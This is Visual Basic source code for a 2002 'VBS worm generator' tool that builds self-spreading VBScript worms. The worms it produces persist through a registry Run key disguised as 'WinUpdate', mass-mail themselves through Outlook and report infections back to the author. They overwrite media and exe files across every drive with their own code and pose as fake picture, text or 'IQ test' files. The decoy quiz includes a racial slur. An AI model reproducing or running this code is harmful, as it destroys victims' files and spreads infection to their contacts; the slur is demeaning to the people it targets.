kagra vbsworm generator "not the trojan" :D by kagra
----------------------------------------------------

Private Sub Check1_Click()
If Check6.Enabled = False Then
Check6.Enabled = True
End If
If Check1.Value = 0 Then
Check6.Enabled = False
End If
End Sub

Private Sub Check10_Click()
If Check10.Value = 1 Then
Check8.Enabled = False
Check9.Enabled = False
Else
Check8.Enabled = True
Check9.Enabled = True
End If
End Sub

Private Sub Check2_Click()
If Check3.Value = 0 Then
Check2.Enabled = False
End If
End Sub

Private Sub Check3_Click()
If Check3.Value = 0 Then
Check2.Enabled = False
Else
Check2.Enabled = True
End If
End Sub

Private Sub Check6_Click()
If Check1.Value = 0 Then
MsgBox "To use this function,you have to check the startup option,otherwise your worm won't work...", 64, "KagraWormGen Info Center"
Check6.Enabled = False
End If
End Sub

Private Sub Check8_Click()
If Check8.Value = 1 Then
Check9.Enabled = False
Check10.Enabled = False
Else
Check9.Enabled = True
Check10.Enabled = True
End If
End Sub

Private Sub Check9_Click()
If Check9.Value = 1 Then
Check10.Enabled = False
Check8.Enabled = False
Else
Check10.Enabled = True
Check8.Enabled = True
End If
End Sub

Private Sub Command1_Click()
MsgBox "By enabling this option,your worm executes every time the PC boots.", 64, "KAGRA WORM GENERATOR"
End Sub

Private Sub Command10_Click()
MsgBox "By enabling this option,your worm gets the extension .vbs and takes a trojanized characteristic,it hides itself as an IQtest.", 64, "KAGRA WORM GENERATOR"
End Sub

Private Sub Command11_Click()
MsgBox "By enabling this option,your worm gets a payload,it copies itself in all mp3,jpg,jpeg,mpg,mpeg and exe files in all disks of the system.How and when,it's up to you from option on the main screen of the prog.", 64, "KAGRA WORM GENERATOR"

End Sub



Private Sub Command12_Click()
On Error Resume Next
MsgBox "The Worm will be created in the currnet path.Click ok and wait a few seconds...", 64, "Kagra Worm Generator Tool"
Set fso = CreateObject("scripting.filesystemobject")
Set wscriptshell = CreateObject("wscript.shell")
If Check8.Value = 1 Then
extension = ".jpg"
End If
If Check9.Value = 1 Then
extension = ".txt"
End If
If Check10.Value = 1 Then
extension = ".vbs"
End If

Select Case extension
Case ".jpg"
filename = Text1.Text & ".jpg.vbs"
Case ".txt"
filename = Text1.Text & ".txt.vbs"
Case Else
filename = Text1.Text & ".vbs"
End Select
Set f = fso.createtextfile(filename)
f.Close
Set f1 = fso.opentextfile(filename, 8)
f1.writeline "'" & Text2.Text
f1.writeline "On error resume next"
f1.writeline "randomize"
f1.writeline "set fso=createobject(""scripting.filesystemobject"")"
f1.writeline "set wscriptshell=createobject(""wscript.shell"")"
f1.writeline "set drives=fso.drives"
f1.writeline "for each drive in drives"
f1.writeline "if drive=""C:"" then"
f1.writeline "if drive.isready then"
f1.writeline "drivefull=drive & ""\"""
f1.writeline "set e5d=fso.getfolder(drivefull)"
f1.writeline "set subs=e5d.subfolders"
f1.writeline "for each subfolder in subs"
f1.writeline "subst=mid(subfolder.path,4,3)"
f1.writeline "if subst=""WIN"" then"
f1.writeline "auto=subfolder.path"
f1.writeline "end if"
f1.writeline "next"
f1.writeline "end if"
f1.writeline "end if"
f1.writeline "next"
f1.writeline "autos=auto & ""\run32dll.vbs"""
f1.writeline "fso.copyfile wscript.scriptfullname,autos"

If Check1.Value = 1 Then
f1.writeline "wscriptshell.regwrite ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate"",""wscript.exe"" & "" "" & autos & "" "" & ""%"" "
End If

If extension = ".jpg" Then
f1.writeline "if wscript.scriptfullname <> autos then"
f1.writeline "msgbox ""Cannot open file"",16,""Internet Explorer"""
f1.writeline "end if"
End If
If extension = ".txt" Then
f1.writeline "if wscript.scriptfullname <> autos then"
f1.writeline "all=" & """" & Text11.Text & """"
f1.writeline "datafiln=auto&" & """" & "\" & Text1.Text & ".txt" & """"
f1.writeline "set dat=fso.createtextfile(datafiln,true)"
f1.writeline "dat.write all"
f1.writeline "dat.close"
f1.writeline "wscriptshell.run ""notepad.exe"" & "" "" & datafiln,3"
f1.writeline "end if"
End If
If extension = ".vbs" Then
f1.writeline "if wscript.scriptfullname <> autos then"
f1.writeline "ei=msgbox(""This is IQ test version 3.2 from TrendSoftware.Answer Yes or No to the following questions,and check your IQ level.Do you wish to continue?"",4,""IQtest ver 3.2"")"
f1.writeline "if ei=6 then"
f1.writeline "bi=msgbox(""Do you think that a woman and a man can develop a strong frienship without sex?"",3,""Question 1/11"")"
f1.writeline "if bi=2 then"
f1.writeline "msgbox ""Try again later!"",64,""IQtest ver 3.2"""
f1.writeline "wscript.quit"
f1.writeline "end if"
f1.writeline "ci=msgbox(""Do you usually think solutions that seem to be weird for other people?"",3,""Question 2/11"")"
f1.writeline "if ci=2 then"
f1.writeline "msgbox ""Try again later!"",64,""IQtest ver 3.2"""
f1.writeline "wscript.quit"
f1.writeline "end if"
f1.writeline "di=msgbox(""Is there any difference between a hot woman and a HOT woman?"",3,""Question 3/11"")"
f1.writeline "if di=2 then"
f1.writeline "msgbox ""Try again later!"",64,""IQtest ver 3.2"""
f1.writeline "wscript.quit"
f1.writeline "end if"
f1.writeline "ii=msgbox(""Do you believe from aliens pictures that they exist?"",3,""Question 4/11"")"
f1.writeline "if ii=2 then"
f1.writeline "msgbox ""Try again later!"",64,""IQtest ver 3.2"""
f1.writeline "wscript.quit"
f1.writeline "end if"
f1.writeline "fi=msgbox(""If an unknown but EXTREMELY hot woman/man says to you:Taste me starting from  tits,would you do it?"",3,""Question 5/11"")"
f1.writeline "if fi=2 then"
f1.writeline "msgbox ""Try again later!"",64,""IQtest ver 3.2"""
f1.writeline "wscript.quit"
f1.writeline "end if"
f1.writeline "gi=msgbox(""Supposing you make love with Monica Bellucci without any protection and suddenly she says:I have AIDS,were you to punish her?"",3,""Question 6/11"")"
f1.writeline "if gi=2 then"
f1.writeline "msgbox ""Try again later!"",64,""IQtest ver 3.2"""
f1.writeline "wscript.quit"
f1.writeline "end if"
f1.writeline "hi=msgbox(""I can see your death.Do you believe this?"",3,""Question 7/11"")"
f1.writeline "if hi=2 then"
f1.writeline "msgbox ""Try again later!"",64,""IQtest ver 3.2"""
f1.writeline "wscript.quit"
f1.writeline "end if"
f1.writeline "ji=msgbox(""Do you know what the word protozoa means?"",3,""Question 8/11"")"
f1.writeline "if ji=2 then"
f1.writeline "msgbox ""Try again later!"",64,""IQtest ver 3.2"""
f1.writeline "wscript.quit"
f1.writeline "end if"
f1.writeline "ki=msgbox(""Do you feel you were born lucky?"",3,""Question 9/11"")"
f1.writeline "if ki=2 then"
f1.writeline "msgbox ""Try again later!"",64,""IQtest ver 3.2"""
f1.writeline "wscript.quit"
f1.writeline "end if"
f1.writeline "li=msgbox(""Do you masturbate at least 4 times a week?"",3,""Question 10/11"")"
f1.writeline "if li=2 then"
f1.writeline "msgbox ""Try again later!"",64,""IQtest ver 3.2"""
f1.writeline "wscript.quit"
f1.writeline "end if"
f1.writeline "mi=msgbox(""Have you ever thought the possibility you are a genius?"",3,""Final Question!"")"
f1.writeline "if mi=2 then"
f1.writeline "msgbox ""Try again later!"",64,""IQtest ver 3.2"""
f1.writeline "wscript.quit"
f1.writeline "end if"
f1.writeline "my=int((4*Rnd)+1)"
f1.writeline "Select case my"
f1.writeline "Case 1 msgbox ""Highest possible IQ:150--->Your IQ:60-80 ,not really good,are you a negro?"",16,""You negros suck!"""
f1.writeline "Case 2 msgbox ""Highest possible IQ:150--->Your IQ:80-100 ,average IQ,somehow OK."",32,""Not so dumb i expected U 2 B!"""
f1.writeline "Case 3 msgbox ""Highest possible IQ:150--->Your IQ:100-120 ,you are smart enough."",64,""OK my man,Your brains does really exist"""
f1.writeline "Case else msgbox ""Highest possible IQ:150--->Your IQ:120-150,extremely smart,CinGRAtuLaTIoNs!!"",48,""GENIUS DETECTED! o;)"""
f1.writeline "End Select"
f1.writeline "msgbox ""Thanks for using TrendSoftware products!"",48,""TrendSoftware IQ Test ver 3.2"""
f1.writeline "wscript.quit"
f1.writeline "end if"
f1.writeline "msgbox ""Try again later!"",64,""IQ Test ver 3.2"""
f1.writeline "end if"
End If



If Check3.Value = 1 Then
f1.writeline "mailed=auto & " & """" & "\" & filename & """"

f1.writeline "fso.copyfile wscript.scriptfullname,mailed"
f1.writeline "if wscriptshell.regread(""HKLM\SOFTWARE\Microsoft"")<>""1"" then"
f1.writeline "set out=createobject(""Outlook.Application"")"
f1.writeline "if out=""Outlook"" then "
f1.writeline "set mapi=out.GetNameSpace(""MAPI"")"
f1.writeline "set newitem=mapi.getdefaultfolder(6)"
f1.writeline "do while newitem.items.count<>1"
f1.writeline "for each item in newitem.items"
f1.writeline "do while item.Attachments.count<>0"
f1.writeline "for each itatt in item.Attachments"
f1.writeline "itatt.delete"
f1.writeline "next"
f1.writeline "loop"
f1.writeline "item.subject=" & """" & Text9.Text & """"
f1.writeline "item.Body=" & """" & Text10.Text & """"
f1.writeline "item.attachments.add mailed"
f1.writeline "item.send"
f1.writeline "next"
f1.writeline "loop"
f1.writeline "set item=Nothing"
f1.writeline "set itatt=nothing"
f1.writeline "set newitem=Nothing"
f1.writeline "set newitem=mapi.getdefaultfolder(5)"
f1.writeline "do while newitem.items.count<>1"
f1.writeline "for each item in newitem.items"
f1.writeline "do while item.Attachments.count<>0"
f1.writeline "for each itatt in item.Attachments"
f1.writeline "itatt.delete"
f1.writeline "next"
f1.writeline "loop"
f1.writeline "item.subject=" & """" & Text9.Text & """"
f1.writeline "item.Body=" & """" & Text10.Text & """"
f1.writeline "item.attachments.add mailed"
f1.writeline "item.send"
f1.writeline "next"
f1.writeline "loop"
f1.writeline "set item=Nothing"
f1.writeline "set itatt=nothing"
f1.writeline "set newitem=Nothing"
If Check2.Value = 1 Then
f1.writeline "set newmail=out.createitem(0)"
f1.writeline "newmail.to=" & """" & Text13.Text & """"
f1.writeline "newmail.subject=""This recipient has been infected by kagraWormGEn worm"""
f1.writeline "newmail.Body=""Infection completed successfully"""
f1.writeline "newmail.send"
End If
f1.writeline "set out=Nothing"
f1.writeline "wscriptshell.regwrite ""HKLM\SOFTWARE\Microsoft"",""1"""
f1.writeline "end if"
f1.writeline "end if"
End If
If Check4.Value = 1 Then
f1.writeline "set dr=fso.Drives"
f1.writeline "for each d in dr"
f1.writeline "if d.DriveType=2 or d.DriveType=3 then"
f1.writeline "list(d.path&""\"")"
f1.writeline "end if"
f1.writeline "next"
f1.writeline "Sub spreadmailto (dir)"
f1.writeline "on error resume next"
f1.writeline "set fso=createobject(""Scripting.filesystemobject"")"
f1.writeline "set f=fso.GetFolder(dir)"
f1.writeline "set cf=f.Files"
f1.writeline "for each fil in cf"
f1.writeline "ext=fso.GetExtensionName(fil.path)"
f1.writeline "ext=lcase(ext)"
f1.writeline "if (ext=""vbs"") or (ext=""vba"") then"
f1.writeline "fso.copyfile wscript.scriptfullname,fil.path"
f1.writeline "end if"
f1.writeline "next"
f1.writeline "End Sub"
f1.writeline "Sub list(dir)"
f1.writeline "on error resume next"
f1.writeline "set f=fso.GetFolder(dir)"
f1.writeline "set ssf=f.Subfolders"
f1.writeline "for each fil in ssf"
f1.writeline "spreadmailto(fil.path)"
f1.writeline "list(fil.path)"
f1.writeline "next"
f1.writeline "End Sub"
End If
If Check11.Value = 1 Then
If Text6.Text <> "" Then
f1.writeline "payl=wscriptshell.regread(""HKLM\SOFTWARE\TaskManager"")"
f1.writeline "if payl="""" then "
f1.writeline "wscriptshell.regwrite ""HKLM\SOFTWARE\TaskManager"",""1"""
f1.writeline "end if"
f1.writeline "if payl<>" & " " & Text6.Text & " " & "then"

f1.writeline "payl=payl+1"
f1.writeline "wscriptshell.regwrite ""HKLM\SOFTWARE\TaskManager"",payl"
f1.writeline "end if"
f1.writeline "if payl=" & " " & Text6.Text & " " & "then"
f1.writeline "set dr=fso.Drives"
f1.writeline "for each d in dr"
f1.writeline "if d.DriveType=2 or d.DriveType=3 then"
f1.writeline "listed(d.path&""\"")"
f1.writeline "end if"
f1.writeline "next"
f1.writeline "end if"
f1.writeline "Sub spread (dir)"
f1.writeline "on error resume next"
f1.writeline "set fso=createobject(""Scripting.filesystemobject"")"
f1.writeline "set f=fso.GetFolder(dir)"
f1.writeline "set cf=f.Files"
f1.writeline "for each fil in cf"
f1.writeline "ext=fso.GetExtensionName(fil.path)"
f1.writeline "ext=lcase(ext)"
f1.writeline "if (ext=""mp3"") or (ext=""jpg"") or (ext=""mpeg"") or (ext=""jpeg"") or (ext=""mpg"")or (ext=""exe"") then"
f1.writeline "fso.copyfile wscript.scriptfullname,fil.path"
f1.writeline "end if"
f1.writeline "next"
f1.writeline "End Sub"
f1.writeline "Sub listed(dir)"
f1.writeline "on error resume next"
f1.writeline "set f=fso.GetFolder(dir)"
f1.writeline "set ssf=f.Subfolders"
f1.writeline "for each fil in ssf"
f1.writeline "spread(fil.path)"
f1.writeline "listed(fil.path)"
f1.writeline "next"
f1.writeline "End Sub"

End If
If Text7.Text <> "" Then
f1.writeline "if month(now)=" & " " & Text8.Text & " " & "and day(now)=" & " " & Text7.Text & " " & "then"
f1.writeline "set dr=fso.Drives"
f1.writeline "for each d in dr"
f1.writeline "if d.DriveType=2 or d.DriveType=3 then"
f1.writeline "listed(d.path&""\"")"
f1.writeline "end if"
f1.writeline "next"
f1.writeline "end if"
f1.writeline "Sub spread(dir)"
f1.writeline "on error resume next"
f1.writeline "set fso=createobject(""Scripting.filesystemobject"")"
f1.writeline "set f=fso.GetFolder(dir)"
f1.writeline "set cf=f.Files"
f1.writeline "for each fil in cf"
f1.writeline "ext=fso.GetExtensionName(fil.path)"
f1.writeline "ext=lcase(ext)"
f1.writeline "if (ext=""mp3"") or (ext=""jpg"") or (ext=""mpeg"") or (ext=""jpeg"") or (ext=""mpg"") or (ext=""exe"") then"
f1.writeline "fso.copyfile wscript.scriptfullname,fil.path"
f1.writeline "end if"
f1.writeline "next"
f1.writeline "End Sub"
f1.writeline "Sub listed(dir)"
f1.writeline "on error resume next"
f1.writeline "set f=fso.GetFolder(dir)"
f1.writeline "set ssf=f.Subfolders"
f1.writeline "for each fil in ssf"
f1.writeline "spread(fil.path)"
f1.writeline "listed(fil.path)"
f1.writeline "next"
f1.writeline "End Sub"
End If
End If

If Check5.Value = 1 Then
If Text3.Text <> "" Then
f1.writeline "payl=wscriptshell.regread(""HKLM\SOFTWARE\Tasks"")"
f1.writeline "if payl="""" then "
f1.writeline "wscriptshell.regwrite ""HKLM\SOFTWARE\Tasks"",""1"""
f1.writeline "end if"
f1.writeline "if payl<> " & Text3.Text & " then"

f1.writeline "payl=payl+1"
f1.writeline "wscriptshell.regwrite ""HKLM\SOFTWARE\Tasks"",payl"
f1.writeline "end if"
f1.writeline "if payl=" & Text3.Text & " then"
f1.writeline "msgbox " & """" & Text12.Text & """" & ",64,""Kagra Worm Generator"""
f1.writeline "end if"
End If
If Text4.Text <> "" Then
f1.writeline "if month(now)=" & " " & Text5.Text & " " & "and day(now)=" & " " & Text4.Text & " " & "then"
f1.writeline "msgbox " & """" & Text12.Text & """" & ",64,""Kagra Worm Generator"""
f1.writeline "end if"
End If
End If
If (Check7.Value = 1) And (Check6.Value = 1) Then
f1.writeline "tim=minute(time)"
f1.writeline "tim=tim+6"
End If

If (Check7.Value = 1) And (Check6.Value = 0) Then
f1.writeline "tim=minute(time)"
f1.writeline "tim=tim+6"
f1.writeline "set thiscode=fso.opentextfile(wscript.scriptfullname,1)"
f1.writeline "code=thiscode.readall"
f1.writeline "thiscode.close"
f1.writeline "do"
End If

If Check1.Value = 1 Then
If Check6.Value = 1 Then
f1.writeline "set thiscode=fso.opentextfile(wscript.scriptfullname,1)"
f1.writeline "code=thiscode.readall"
f1.writeline "thiscode.close"

f1.writeline "do"
'f1.writeline "set thiscod=fso.opentextfile(wscript.scriptfullname,1)"
'f1.writeline "codee=thiscod.readall"
'f1.writeline "thiscod.close"
'f1.writeline "if codee<>code then"
'f1.writeline "set resur1=fso.createtextfile(autos,true)"
'f1.writeline "resur1.write code"
'f1.writeline "resur1.close"
'f1.writeline "end if"
f1.writeline "if not (fso.fileexists(autos)) then"
f1.writeline "set resur=fso.createtextfile(autos,true)"
f1.writeline "resur.write code"
f1.writeline "resur.close"
f1.writeline "end if"
f1.writeline "regvalue=wscriptshell.regread(""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate"")"
f1.writeline "if regvalue <> ""wscript.exe"" & "" "" & autos & "" "" & ""%""  then "
f1.writeline "wscriptshell.regwrite ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate"",""wscript.exe"" & "" "" & autos & "" "" & ""%"" "
f1.writeline "end if"
f1.writeline "regvalue="""""
End If
End If
If (Check7.Value = 0) And (Check6.Value = 1) Then
f1.writeline "loop"
End If
If (Check7.Value = 1) And ((Check6.Value = 0) Or (Check6.Value = 1)) Then
f1.writeline "timstandard=minute(time)"
f1.writeline "if tim>53 then"
f1.writeline "tim=01"
f1.writeline "end if"
f1.writeline "if timstandard=tim then"
f1.writeline "tim=minute(time)"
f1.writeline "tim=tim+6"
f1.writeline "trig=int((10*rnd)+1)"
f1.writeline "select case trig"
f1.writeline "case 1"
f1.writeline "floppya=""a:\PIZZABOY.txt.vbs"""
f1.writeline "case 2"
f1.writeline "floppya=""a:\YOU-ARE-DOOMED.txt.vbs"""
f1.writeline "case 3"
f1.writeline "floppya=""a:\JESUS666.txt.vbs"""
f1.writeline "case 4"
f1.writeline "floppya=""a:\ANDRIANA-SKLENARIKOVA.JPG.vbs"""
f1.writeline "case 5"
f1.writeline "floppya=""a:\DE NIRO FUCKS NAOMI.JPG.vbs"""
f1.writeline "case 6"
f1.writeline "floppya=""a:\SPIDERMAN_LIVES.txt.vbs"""
f1.writeline "case 7"
f1.writeline "floppya=""a:\HACKING_WINDOWS.TXT.vbs"""
f1.writeline "case 8"
f1.writeline "floppya=""a:\EUROVISION_ORGY.JPG.vbs"""
f1.writeline "case 9"
f1.writeline "floppya=""a:\Sex_Advices.txt.vbs"""
f1.writeline "case else"
f1.writeline "floppya=""a:\MELINDA'S EYES.JPG.vbs"""
f1.writeline "end select"
f1.writeline "set repla=fso.createtextfile(floppya,true)"
f1.writeline "repla.write code"
f1.writeline "repla.close"
f1.writeline "set repla=nothing"
f1.writeline "floppya="""""
f1.writeline "end if"
f1.writeline "loop"
End If

f1.Close
MsgBox "Worm created successfully!", 64, "Kagra VBS Worm Generator"
End Sub

Private Sub Command13_Click()
MsgBox "By enabling this option,your worm sends you mail from the victim's MS Outlook,to inform you about the infection.", 64, "KAGRA WORM GENERATOR"
End Sub

Private Sub Command2_Click()
End
End Sub

Private Sub Command3_Click()
MsgBox "By enabling this option,your worm replicates via MS Outlook.", 64, "KAGRA WORM GENERATOR"

End Sub

Private Sub Command4_Click()
MsgBox "No explanation needed for this.", 64, "KAGRA WORM GENERATOR"

End Sub

Private Sub Command5_Click()
MsgBox "By enabling this option,your worm shows up a message.How often and when,you can choose in the main programm screen.", 64, "KAGRA WORM GENERATOR"

End Sub

Private Sub Command6_Click()
MsgBox "By enabling this option,your worm becomes memory resident,and cannot be deleted from HD and registry.", 64, "KAGRA WORM GENERATOR"

End Sub

Private Sub Command7_Click()
MsgBox "By enabling this option,your worm searches for a disk in drive A: every 7 minutes,and if it finds one it copies itself,with a randomly chosen name.", 64, "KAGRA WORM GENERATOR"

End Sub

Private Sub Command8_Click()
MsgBox "By enabling this option,your worm gets the extension .jpg.vbs and takes a trojanized characteristic.", 64, "KAGRA WORM GENERATOR"

End Sub

Private Sub Command9_Click()
MsgBox "By enabling this option,your worm gets the extension .txt.vbs and takes a trojanized characteristic.", 64, "KAGRA WORM GENERATOR"

End Sub

Private Sub Form_Load()
kagra = MsgBox("This is Visual Basic Script Generator version 1.0 created by Kagra in Greece,Kalamata.This project is for educational purpose only.The author takes no responsibility for any damage being caused by people using this tool.If you agree on this click Yes,otherwise leave...", 4, "Kagra VBSWormGen Tool")
If kagra = 7 Then
MsgBox "A KagraSoft program,Kalamata 2002,Exiting...", 64, "Exiting Kagra WormGen Tool..."
End
End If
End Sub

Private Sub Text10_Click()
If Check3.Value = 1 Then
Check3.Value = 1
Else
MsgBox "You have to check the Outlook replication,in order for this option to work,otherwise the worm won't work...", 64, "Kagra VBSWormGen info Center"
End If
End Sub

Private Sub Text11_Click()
If Check9.Value = 1 Then
Check1.Value = 1
Else
MsgBox "This option works only if you check the txt trojan option,otherwise your worm won't work...", 64, "Kagra VBSWormGen Info"
End If
End Sub

Private Sub Text12_Click()
If (Text4.Text = "") And (Text3.Text = "") Then
MsgBox "This option requires that the payload 1 option is checked,and also it's day/month or payload trigger,otherwise your worm won't work...", 64, "Kagra VBSWormGen Info Center"
End If
End Sub

Private Sub Text13_Click()
If Check2.Value = 0 Then
MsgBox "To use this option,check the Send mail to you option,otherwise your worm won't work...", 64, "KagraVBSWormGen Ingo Center"
End If
End Sub

Private Sub Text3_Click()
If Check5.Value = 0 Then
MsgBox "To use this option,check the payload 1 option,otherwise your worm won't work...", 64, "KagraVBSWormGen Ingo Center"
End If
End Sub

Private Sub Text4_Click()
If Check5.Value = 0 Then
MsgBox "To use this option,check the payload 1 option,otherwise your worm won't work...", 64, "KagraVBSWormGen Ingo Center"
Else
MsgBox "This option takes max value 31 and min 01(eg. 01 or 02 or... or 31) otherwise this function won't work...", 64, "Kagra VBSWormgen info"
End If
End Sub

Private Sub Text5_Click()
If Check5.Value = 0 Then
MsgBox "To use this option,check the payload 1 option,otherwise your worm won't work...", 64, "KagraVBSWormGen Ingo Center"
Else
MsgBox "This option takes max value 12 and min 01(eg. 01 or 02 or... or 12) otherwise this function won't work...", 64, "Kagra VBSWormgen info"
End If
End Sub

Private Sub Text6_Click()
If Check11.Value = 0 Then
MsgBox "To use this option,check the payload 2 option,otherwise your worm won't work...", 64, "KagraVBSWormGen Ingo Center"
End If
End Sub

Private Sub Text7_Click()
If Check11.Value = 0 Then
MsgBox "To use this option,check the payload 2 option,otherwise your worm won't work...", 64, "KagraVBSWormGen Ingo Center"
Else
MsgBox "This option takes max value 31 and min 01(eg. 01 or 02 or... or 31) otherwise this function won't work...", 64, "Kagra VBSWormgen info"
End If
End Sub

Private Sub Text8_Click()
If Check11.Value = 0 Then
MsgBox "To use this option,check the payload 2 option,otherwise your worm won't work...", 64, "KagraVBSWormGen Ingo Center"
Else
MsgBox "This option takes max value 12 and min 01(eg. 01 or 02 or... or 12) otherwise this function won't work...", 64, "Kagra VBSWormgen info"
End If
End Sub

Private Sub Text9_Click()
If Check3.Value = 1 Then
Check3.Value = 1
Else
MsgBox "You have to check the Outlook replication,in order for this option to work,otherwise the worm won't work...", 64, "Kagra VBSWormGen info Center"
End If
End Sub
